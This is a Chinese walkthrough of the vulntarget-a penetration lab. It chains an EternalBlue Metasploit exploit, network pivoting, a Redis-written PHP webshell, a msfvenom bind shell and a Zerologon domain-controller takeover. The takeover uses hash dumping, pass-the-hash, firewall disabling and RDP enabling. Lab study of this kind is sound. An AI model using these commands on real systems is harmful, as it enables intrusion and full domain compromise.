巨细巨细的白痴级vulntarget-a靶场wp再不会你打死我

ad一,靶场搭建

下载靶场:GitHub - crow821/vulntarget: vulntarget靶场系列

官方拓补图

 ps:此处 攻击机ip192.168.87.134,win7ip1为192.168.87.144

下载完毕后直接装入虚拟机不要进去,不要进去,不要进去

唯一 要修改的是网卡

设置虚拟网卡:默认为vmnet18和vmnet19

找到虚拟网卡编辑器

右下角点更改设置

同下图配置vmnet18

同理配置vmnet19

 

检查各设备的网卡设置

 

单机选设置打开窗口查看

win2019

 

Win11016

 

win7

 

配完去攻击机上访问win7ip看看能否访问,可以就表示配置完成

渗透开始 

信息收集(win7)

nmap  -sT 192.168.87.0/24

发现win7

访问 

 

查看开放了那些端口

nmap -sT --min-rate 10000 -p- 192.168.87.144 

发现开放了445端口,决定用永恒之蓝一把嗦

 输入msfconsole启动msf

clearsearch ms17-010use 0set Rhost 192.168.87.144run

 

进入meterperter成功拿下

win7信息收集

ipconfig

发现了c段位20的内网

 但别急先留个路由

run post/multi/manage/autoroute

 退回msf6(小白必看)

bgback

这么做是为了保存session

搜索20c段的主机

使用arp_scanner模块

use post/windows/gather/arp_scanner
set session 1
set rhosts 10.0.20.0/24

 发现了99主机

使用socks_proxy做代理

use auxiliary/server/socks_proxy
set version 4a
run

修改etc/proxychains4.conf

vim /etc/proxychains4.conf

加上 socks4即可

esc:wq退出

使用proxychains4对10.0.20.99进行端口扫描

proxychains4 nmap -Pn -sT -p21,22,23,80-90,161,389,443,445,873,1099,1433,1521,1900,2082,2083,2222,2601,2604,3128,3306,3311,3312,3389,4440,4848,5432,5560,5900,5901,5902,6082,6379,7001-7010,7778,8080-8090,8649,8888,9000,9200,10000,11211,27017,28017,50000,50030,50060,135,139,445,53,88 10.0.20.99

看结果

扫到了 如上端口

开放了80端口访问一下phpinfo.php

ctrl f搜索root

发现了根目录路径

 使用redis未授权访问xieshell

注意kali不会自带redis使用要下载redis

redis下载

参考http://t.csdnimg.cn/FnwUE

proxychains4 redis-cli -h 10.0.20.99

进入目录写入shell

config set dir 'C:/phpStudy/PHPTutorial/WWW/'
config set dbfilename shell.php
set 1 "<?php @eval($_POST['cmd'])?>"
save

 用procychains4代理使用哥斯拉连接

哥斯拉下载

官网https://github.com/BeichenDream/Godzilla

 

下载jar包后拖入虚拟机使用

注意使用时要保证你处于jar包同更目录不然访问不到

以砖面为例

弹出界面即唱功

 点击target,选择add,如下填写

 添加唱功后enter进入

进入控制台

 

 关闭防火前以便于传shell

netsh advfirewall set allprofiles state off		

用msfvenom写一个shell 

msfvenom -p windows/x64/meterpreter/bind_tcp rhost=10.0.20.99 lport=4444 -f exe -o shell.exe

 可在桌面上发现

打开f哥斯拉的ilemanger 拖入上传

 打开控制台运行shell

.\shell.exe

 msf连接shell

成功

win2016信息收集

ipconfig发现10c段

加个路由先

run post/multi/manage/autoroute

 进shell继续星系收集

 

shellChcp 65001  #优化shell使用utf-8编码systeminfo

发现了域 vulntarget.com

查看域控(有时不好使)

net group "Domain Controllers" /domain

发现域控win2019ping一下

 

ping -n 1 WIN2019

ip为 10.0.10.110

CVE-2020-1472上线域控

exp下载

地址https://github.com/VoidSec/CVE-2020-1472

 

下这个就行,放桌面

运行

proxychains4 python3 cve-2020-1472-exploit.py 域控主机名 域控IP
proxychains4 python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110
不行的话
给他加个参数
proxychains4 python3 cve-2020-1472-exploit.py -t WIN2019 -n 10.0.10.110

获取hash

proxychains4 impacket-secretsdump vulntarget.com/win2019\$@10.0.10.110 -no-pass

 得到hash,wmiexec上线

proxychains4 impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:9099d68602a60f007c227c4fa95fada6 ./administrator@10.0.10.110

成功

net user administrator p-0p-0p-0 /domain		#修改域控密码
netsh advfirewall set allprofiles state off		#关防火墙#开3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

已完成不做演示,已经打穿

图形化连接域控

使用remmina

apt install -y remmina
或
dnf install -y remmina

启动

proxychains4 remmina

改下配置

连接

 

 

 

成功

修改一下窗口尺寸

点玩后ctrl加滚轮可对其缩放

但有时会遇到连接失败的问题

是3389打开与否问题

可尝试

 reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /fwmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allowreg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/20436.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

lms如何连接测试前端:全面解析与操作指南

lms如何连接测试前端&#xff1a;全面解析与操作指南 在软件开发的世界里&#xff0c;连接学习管理系统&#xff08;LMS&#xff09;与测试前端是一个复杂但至关重要的任务。本文将从四个方面、五个方面、六个方面和七个方面&#xff0c;详细解析lms如何连接测试前端&#xff…

OpenHarmony应用在DevEco Studio配置默认密钥为123456的签名如何进行一键签名,运行起来

目录 一.背景知识 二.完成自动化操作 三.在DevEco Studio中配置自动化签名 一.背景知识 首先OpenHarmony的应用需要使用OpenH

一个完整的springboot项目,我们还需要做什么

文章目录 一 从0创建Srpingboot项目1.1 启动springboot项目1.2 导入必要的依赖 二、还缺什么2.1 统一异常捕获2.2 统一MVC返回2.3 数据分层2.4 连接数据库模块2.5 放置常量和工具类2.6 基础controller、基础entity、query查询类2.7 为了方便处理异常&#xff0c;一般还可以入参…

d3dcompiler43.dll丢失怎么修复,分享几种有效的修复教程

电脑已经成为我们生活中不可或缺的一部分。然而&#xff0c;由于各种原因&#xff0c;电脑可能会出现一些问题&#xff0c;其中之一就是d3dcompiler43.dll文件丢失。这个文件是DirectX组件之一&#xff0c;用于编译和链接DirectX应用程序。当这个文件丢失时&#xff0c;可能会导…

小白月赛91E Bingbong的字符串世界

知识点&#xff1a;系列自动机 刚开始想偏了&#xff0c;直接在字符串上操作&#xff0c;导致漏算了一些字符&#xff0c;ACCEPT前后都可以有字符串。 所以参考b站的讲解&#xff0c;要使用一个二维数组记录从i位开始第一次出现某字母的位置&#xff08;某字母指26个大写字母…

网安面试。

SQL注入 sql注入原理 对用户输入的数据没有进行严格的过滤与判断&#xff0c;导致用户构造各种恶意 payload 拼接进后台数据库查询语句中执行。 sql的类型 联合注入 堆叠注入 宽字节注入 cookie注入 XFF头注入 UA注入&#xff08;user-agent注入&#xff09; Referer注…

AI大模型探索之路-实战篇12: 构建互动式Agent智能数据分析平台:实现多轮对话控制

系列篇章&#x1f4a5; AI大模型探索之路-实战篇4&#xff1a;深入DB-GPT数据应用开发框架调研 AI大模型探索之路-实战篇5&#xff1a;探索Open Interpreter开放代码解释器调研 AI大模型探索之路-实战篇6&#xff1a;掌握Function Calling的详细流程 AI大模型探索之路-实战篇7…

nnUNet保姆级使用教程!从环境配置到训练与推理(新手必看)

文章目录 写在前面nnUNet是什么&#xff1f;一、配置虚拟环境二、安装nnUNet框架1.安装nnUNet这一步我遇到的两个问题&#xff1a; 2.安装隐藏层hiddenlayer&#xff08;可选&#xff09; 三、数据集准备nnUNet对于你要训练的数据是有严格要求的&#xff0c;这第一点就体现在我…

004 CentOS 7.9 mongodb7.0.11安装及配置

https://www.mongodb.com/try/download/shell https://www.mongodb.com/try/download/community 文章目录 /etc/mongod.conf在 /etc/systemd/system/ 目录下创建一个名为 mongod.service 的文件重新加载 systemd 配置&#xff1a;启用服务&#xff1a;现在&#xff0c;可以手动…

WEB攻防-JAVAWEB项目常见漏洞

知识点 1.JavaWeb常见安全及代码逻辑 2.目录遍历&身份验证&逻辑&JWT 3.访问控制&安全组件&越权&三方组件 本篇主要了解以上问题在javaweb中的呈现&#xff0c; 第一个重点理解URL与javaweb代码框架的对应方式&#xff0c;java在没有代码的情况下是很难…

151.反转字符串中的单词

给你一个字符串 s &#xff0c;请你反转字符串中单词的顺序。 单词 是由非空格字符组成的字符串。s 中使用至少一个空格将字符串中的单词分隔开。 返回单词顺序颠倒且单词之间用单个空格连接的结果字符串。 注意&#xff1a;输入字符串 s中可能会存在前导空格、尾随空格或者单词…

PMP学习和考试难度分析

PMP&#xff08;项目管理专业人士&#xff09;考试目前是全球范围内比较具权威性和认可度的项目管理证书之一。因此PMP考试的难度是一个备受关注的话题。根据我们以往的学员经验我从不同角度解析PMP考试的难度&#xff0c;并提供一些应对挑战的建议。希望对大家有所帮助。 PMP考…

关于二进制中1的个数的研究

先看以下代码&#xff1a; #include<bits/stdc.h> #define ll long long #define un unsigned using namespace std; ll a[500005]; ll x[500005]; void init(){for(int i1;i<500000;i){x[i]__builtin_popcount(i); } } int main(){init();for(int i1;i<500000;i)…

Ubuntu 安装好虚拟环境后,找不到workon 命令

1、安装虚拟环境 pip3 install virtualenv pip3 install virtualenvwrapper 2、安装完成后 workon 命令。 找不到workon 命令 执行&#xff0c;source virtualenvwrapper.sh 执行后&#xff0c;在使用workon命令&#xff0c;即可完成。

JS【详解】时间复杂度

时间复杂度是从时间维度描述一段代码的复杂程度&#xff0c;由一段代码中执行频次最高的语句决定&#xff0c;用大O符号表述。 时间复杂度的分类 从低到高依次是&#xff1a; 常数时间复杂度 O(1)&#xff1a;无论问题规模如何变化&#xff0c;算法的运行时间都保持不变。 线性…

君耐策划有限公司员工信息管理系统的设计

管理员账户功能包括&#xff1a;系统首页&#xff0c;个人中心&#xff0c;管理员管理&#xff0c;基础数据管理&#xff0c;公告管理&#xff0c;薪资管理&#xff0c;员工考勤管理 员工账户功能包括&#xff1a;系统首页&#xff0c;个人中心&#xff0c;公告管理&#xff0…

vivo鄢楠:基于OceanBase 的降本增效实践

在3 月 20 日的2024 OceanBase 数据库城市行中&#xff0c;vivo的 体系与流程 IT 部 DBA 组总监鄢楠就“vivo 基于 OceanBase 的降本增效实践”进行了主题演讲。本文为该演讲的精彩回顾。 vivo 在1995年于中国东莞成立&#xff0c;作为一家全球领先的移动互联网智能终端公司&am…

【智能算法】吸引-排斥优化算法(AROA)原理及实现

目录 1.背景2.算法原理2.1算法思想2.2算法过程 3.结果展示4.参考文献5.代码获取 1.背景 2024年&#xff0c;K Cymerys受到自然界中吸引-排斥现象启发&#xff0c;提出了吸引-排斥优化算法&#xff08;Attraction–Repulsion Optimization Algorithm, AROA&#xff09;。 2.算法…

Python—面向对象小解(5)

一、多任务介绍 1.1 进程与线程 进程是操作系统分配资源的最小单元 线程执行程序的的最小单元 线程依赖进程&#xff0c;可以获取进程的资源 一个程序执行 先要创建进程分配资源&#xff0c;然后使用线程执行任务 默认情况下一个进程中有一个线程 1.2 多任务介绍 运行多个进程…

代码随想录算法训练营第四十五天| 1049. 最后一块石头的重量 II、494. 目标和、474.一和零

1049. 最后一块石头的重量 II 题目链接&#xff1a;1049. 最后一块石头的重量 II 文档讲解&#xff1a;代码随想录/最后一块石头的重量 II 视频讲解&#xff1a;视频讲解-最后一块石头的重量 II 状态&#xff1a;已完成&#xff08;1遍&#xff09; 解题过程 这几天属实是有…